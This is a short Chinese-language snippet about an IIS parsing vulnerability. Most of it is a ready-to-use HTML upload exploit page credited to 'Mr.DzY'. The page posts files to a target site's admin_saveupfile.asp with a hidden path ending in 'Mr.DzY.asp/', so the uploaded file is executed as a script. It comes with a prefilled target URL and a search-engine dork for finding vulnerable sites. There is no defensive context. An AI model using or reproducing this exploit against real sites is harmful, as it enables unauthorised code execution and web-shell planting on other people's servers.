一个IIS的解析漏洞
<title>上传EXP by Mr.DzY</title> <center> <form action="" method=post enctype="multipart/form-data"> <INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="50"> 网址:<input type=text name=url value="http://www.yyjxsb.com/" size=62><br><br> <td><input name="file" type="file" size="45" onChange="showpic(this.value)"><input type="hidden" name="filepath" value="../Mr.DzY.asp/"><input name="hdnISSPic" type="hidden" id="hdnISSPic" value=""></td><br><br> <input type=button value=大牛啊,点我上传吧 onclick=fsubmit()> </form><br> <script> function fsubmit(){ form = document.forms[0]; form.action = form.url.value+'/admin/admin_saveupfile.asp'; form.submit(); } </script> keyword: inurl:ShowProduct.asp?id= 请在这里输入产品的详细说明(可插入图片)